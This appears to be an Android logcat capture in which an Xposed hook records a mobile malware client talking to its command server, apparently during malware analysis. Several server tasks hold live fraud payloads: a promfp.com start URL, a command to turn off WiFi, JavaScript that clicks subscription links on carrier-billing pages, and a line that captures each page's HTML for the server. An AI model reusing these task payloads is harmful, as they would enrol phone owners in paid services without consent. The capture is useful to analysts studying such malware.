11-20 07:46:27.197 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 07:46:27.680 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 07:46:27.733 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"651624\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 07:47:27.820 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 07:47:27.828 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"07:46:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"651624\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 07:47:28.620 I/Xposed (18830): [+] SERVER: []
11-20 07:47:28.637 I/Xposed (18830): [+] SERVER: [{"id":354699,"name":"OK"}]
11-20 07:48:27.832 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 07:48:28.805 I/Xposed (18830): [+] SERVER: []
11-20 07:49:27.838 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 07:49:28.846 I/Xposed (18830): [+] SERVER: []
11-20 07:50:27.869 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 07:50:29.056 I/Xposed (18830): [+] SERVER: []
11-20 07:51:27.877 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 07:51:28.957 I/Xposed (18830): [+] SERVER: [{"id":739040,"name":"interval","params":{"interval":1800}}]
11-20 07:51:29.013 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"07:51:28 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"739040\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 07:51:29.245 I/Xposed (18830): [+] SERVER: [{"id":595951,"name":"OK"}]
11-20 08:21:29.110 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 08:21:30.095 I/Xposed (18830): [+] SERVER: [{"id":333831,"name":"interval","params":{"interval":1800}}]
11-20 08:21:30.138 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"08:21:30 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"333831\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 08:21:30.374 I/Xposed (18830): [+] SERVER: [{"id":817703,"name":"OK"}]
11-20 08:51:30.227 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 08:51:31.116 I/Xposed (18830): [+] SERVER: [{"id":790958,"name":"interval","params":{"interval":1800}}]
11-20 08:51:31.166 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"08:51:31 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"790958\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 08:51:31.397 I/Xposed (18830): [+] SERVER: [{"id":472866,"name":"OK"}]
11-20 09:21:31.185 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 09:21:32.469 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12908b98292","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":533852,"name":"interval","params":{"interval":60}}]
11-20 09:21:32.531 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"09:21:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 09:21:32.621 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"09:21:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"09:21:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"533852\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 09:22:32.835 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-20 09:22:32.836 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"09:21:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"09:21:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"533852\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"09:22:32 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 09:23:32.830 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 09:23:32.838 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"09:21:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"09:21:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"533852\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"09:22:32 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 09:23:33.637 I/Xposed (18830): [+] SERVER: []
11-20 09:23:33.646 I/Xposed (18830): [+] SERVER: [{"id":964934,"name":"OK"}]
11-20 09:24:32.850 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 09:24:33.885 I/Xposed (18830): [+] SERVER: []
11-20 09:25:32.848 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 09:25:33.646 I/Xposed (18830): [+] SERVER: []
11-20 09:26:32.891 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 09:26:33.818 I/Xposed (18830): [+] SERVER: []
11-20 09:27:32.908 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 09:27:33.905 I/Xposed (18830): [+] SERVER: [{"id":188648,"name":"interval","params":{"interval":1800}}]
11-20 09:27:33.961 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"09:27:33 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"188648\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 09:27:34.206 I/Xposed (18830): [+] SERVER: [{"id":582403,"name":"OK"}]
11-20 09:57:33.968 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 09:57:34.847 I/Xposed (18830): [+] SERVER: [{"id":465369,"name":"interval","params":{"interval":1800}}]
11-20 09:57:34.898 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"09:57:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"465369\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 09:57:35.135 I/Xposed (18830): [+] SERVER: [{"id":487565,"name":"OK"}]
11-20 10:27:34.969 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 10:27:36.147 I/Xposed (18830): [+] SERVER: [{"id":184667,"name":"interval","params":{"interval":1800}}]
11-20 10:27:36.197 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"10:27:36 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"184667\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 10:27:36.435 I/Xposed (18830): [+] SERVER: [{"id":128745,"name":"OK"}]
11-20 10:57:36.261 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 10:57:36.981 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12a71071008","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":826657,"name":"interval","params":{"interval":60}}]
11-20 10:57:37.073 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"10:57:37 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 10:58:37.351 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"10:57:37 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"10:57:37 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"826657\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"10:58:37 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 10:58:37.362 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-20 10:59:37.348 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"10:57:37 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"10:57:37 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"826657\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"10:58:37 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 10:59:37.361 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 10:59:37.939 I/Xposed (18830): [+] SERVER: [{"id":621012,"name":"OK"}]
11-20 10:59:37.949 I/Xposed (18830): [+] SERVER: []
11-20 11:00:37.405 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 11:00:39.276 I/Xposed (18830): [+] SERVER: []
11-20 11:01:37.398 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 11:01:40.715 I/Xposed (18830): [+] SERVER: []
11-20 11:02:37.428 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 11:02:39.695 I/Xposed (18830): [+] SERVER: []
11-20 11:03:37.454 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 11:03:40.615 I/Xposed (18830): [+] SERVER: [{"id":926853,"name":"interval","params":{"interval":1800}}]
11-20 11:03:40.682 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"11:03:40 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"926853\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 11:03:41.476 I/Xposed (18830): [+] SERVER: [{"id":825352,"name":"OK"}]
11-20 11:33:40.764 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 11:33:41.294 I/Xposed (18830): [+] SERVER: [{"id":963270,"name":"interval","params":{"interval":1800}}]
11-20 11:33:41.362 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"11:33:41 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"963270\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 11:33:41.546 I/Xposed (18830): [+] SERVER: [{"id":430352,"name":"OK"}]
11-20 12:04:53.857 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 12:04:56.275 I/Xposed (18830): [+] SERVER: [{"id":498236,"name":"interval","params":{"interval":1800}}]
11-20 12:04:56.343 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"12:04:56 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"498236\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 12:04:56.746 I/Xposed (18830): [+] SERVER: [{"id":842306,"name":"OK"}]
11-20 12:34:56.479 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 12:34:57.852 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12bde0aee2d","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":525721,"name":"interval","params":{"interval":60}}]
11-20 12:35:58.160 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 12:35:58.576 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 12:35:58.632 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"525721\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 12:36:58.690 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"12:35:58 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"525721\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 12:36:58.702 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 12:37:01.251 I/Xposed (18830): [+] SERVER: [{"id":648110,"name":"OK"}]
11-20 12:37:01.259 I/Xposed (18830): [+] SERVER: []
11-20 12:37:58.721 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 12:38:00.305 I/Xposed (18830): [+] SERVER: []
11-20 12:38:58.760 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 12:39:01.045 I/Xposed (18830): [+] SERVER: []
11-20 12:39:58.776 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 12:39:59.596 I/Xposed (18830): [+] SERVER: []
11-20 12:40:58.806 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 12:40:59.637 I/Xposed (18830): [+] SERVER: [{"id":720544,"name":"interval","params":{"interval":1800}}]
11-20 12:40:59.693 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"12:40:59 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"720544\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 12:40:59.864 I/Xposed (18830): [+] SERVER: [{"id":598435,"name":"OK"}]
11-20 13:10:59.780 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
